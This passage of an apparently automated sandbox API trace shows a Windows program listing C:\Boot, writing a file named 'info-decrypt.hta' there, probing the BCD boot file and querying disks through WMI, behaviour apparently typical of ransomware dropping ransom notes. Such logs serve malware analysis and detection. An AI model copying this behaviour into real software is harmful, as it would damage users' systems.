ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.190] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0131.190] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0131.190] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0131.190] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0131.190] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0131.191] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0131.191] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0131.191] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0131.191] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0131.191] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0131.191] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0131.191] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0131.192] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0131.192] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0131.192] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0131.192] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0131.192] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0131.192] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0131.192] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0131.192] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0131.193] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.193] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0131.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f66c) returned 1 [0131.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f678) returned 1 [0136.466] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD", lpFilePart=0x0) returned 0xb [0136.496] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD", lpFilePart=0x0) returned 0xb [0136.496] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0136.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f5cc) returned 1 [0136.496] GetFileAttributesExW (in: lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f648 | out: lpFileInformation=0x689f648*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0136.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f5c8) returned 1 [0136.497] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD", lpFilePart=0x0) returned 0xb [0136.497] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f00c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0136.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f500) returned 1 [0136.497] CreateFileW (lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3a8 [0136.504] GetFileType (hFile=0x3a8) returned 0x1 [0136.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4fc) returned 1 [0136.504] GetFileType (hFile=0x3a8) returned 0x1 [0136.504] WriteFile (in: hFile=0x3a8, lpBuffer=0x33efa40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x689f5c4, lpOverlapped=0x0 | out: lpBuffer=0x33efa40*, lpNumberOfBytesWritten=0x689f5c4*=0x1000, lpOverlapped=0x0) returned 1 [0136.506] WriteFile (in: hFile=0x3a8, lpBuffer=0x33efa40*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x689f598, lpOverlapped=0x0 | out: lpBuffer=0x33efa40*, lpNumberOfBytesWritten=0x689f598*=0x557, lpOverlapped=0x0) returned 1 [0136.506] CloseHandle (hObject=0x3a8) returned 1 [0136.506] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD", nBufferLength=0x105, lpBuffer=0x689f0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD", lpFilePart=0x0) returned 0xb [0136.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f594) returned 1 [0136.506] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), fInfoLevelId=0x0, lpFileInformation=0x33f0a5c | out: lpFileInformation=0x33f0a5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0136.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f590) returned 1 [0136.506] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD", nBufferLength=0x105, lpBuffer=0x689efd4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD", lpFilePart=0x0) returned 0xb [0136.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4c8) returned 1 [0136.506] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0136.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e300) returned 1 [0136.519] CoTaskMemAlloc (cb=0x20c) returned 0x7b9830 [0136.519] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b9830 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0136.519] CoTaskMemFree (pv=0x7b9830) [0136.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689efa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0136.519] CoGetObjectContext (in: riid=0x33a8fd0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4f0 | out: ppv=0x689f4f0*=0x72015c) returned 0x0 [0136.519] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f4e8 | out: pAptType=0x689f4e8*=1) returned 0x0 [0136.519] IUnknown:QueryInterface (in: This=0x72015c, riid=0x33a8fb8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f4ec | out: ppvObject=0x689f4ec*=0x0) returned 0x80004002 [0136.519] IUnknown:Release (This=0x72015c) returned 0x1 [0136.520] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee58 | out: ppv=0x689ee58*=0x6736f28) returned 0x0 [0136.521] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f070 | out: ppvObject=0x689f070*=0x0) returned 0x80004002 [0136.521] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f084 | out: ppvObject=0x689f084*=0x6738690) returned 0x0 [0136.521] WbemDefPath:IUnknown:Release (This=0x6736f28) returned 0x0 [0136.521] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eca4 | out: ppvObject=0x689eca4*=0x6738690) returned 0x0 [0136.521] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec60 | out: ppvObject=0x689ec60*=0x0) returned 0x80004002 [0136.521] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0136.521] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e5bc | out: ppvObject=0x689e5bc*=0x0) returned 0x80004002 [0136.521] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0136.521] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e578 | out: ppvObject=0x689e578*=0x77db18) returned 0x0 [0136.521] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77db18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e580 | out: pCid=0x689e580*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0136.521] WbemDefPath:IUnknown:Release (This=0x77db18) returned 0x3 [0136.521] CoGetContextToken (in: pToken=0x689e5d8 | out: pToken=0x689e5d8) returned 0x0 [0136.521] CoGetContextToken (in: pToken=0x689e9e0 | out: pToken=0x689e9e0) returned 0x0 [0136.521] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea70 | out: ppvObject=0x689ea70*=0x0) returned 0x80004002 [0136.522] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0136.522] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0136.522] CoGetContextToken (in: pToken=0x689f368 | out: pToken=0x689f368) returned 0x0 [0136.522] CoGetContextToken (in: pToken=0x689f2c8 | out: pToken=0x689f2c8) returned 0x0 [0136.522] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x689f398*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f394 | out: ppvObject=0x689f394*=0x6738690) returned 0x0 [0136.522] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0136.522] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0136.522] WbemDefPath:IWbemPath:SetText (This=0x6738690, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x689f518*=0x0, pszText=0x0 | out: puBuffLength=0x689f518*=0x20, pszText=0x0) returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x689f518*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f518*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x689f49c | out: puCount=0x689f49c*=0x0) returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f488 | out: puCount=0x689f488*=0x2) returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0x0, pszText=0x0 | out: puBuffLength=0x689f484*=0xf, pszText=0x0) returned 0x0 [0136.522] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f484*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0136.522] CoGetObjectContext (in: riid=0x33a8fd0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f438 | out: ppv=0x689f438*=0x72015c) returned 0x0 [0136.522] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f430 | out: pAptType=0x689f430*=1) returned 0x0 [0136.522] IUnknown:QueryInterface (in: This=0x72015c, riid=0x33a8fb8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f434 | out: ppvObject=0x689f434*=0x0) returned 0x80004002 [0136.522] IUnknown:Release (This=0x72015c) returned 0x1 [0136.523] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689eda0 | out: ppv=0x689eda0*=0x6736f48) returned 0x0 [0136.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689efb8 | out: ppvObject=0x689efb8*=0x0) returned 0x80004002 [0136.523] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f48, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 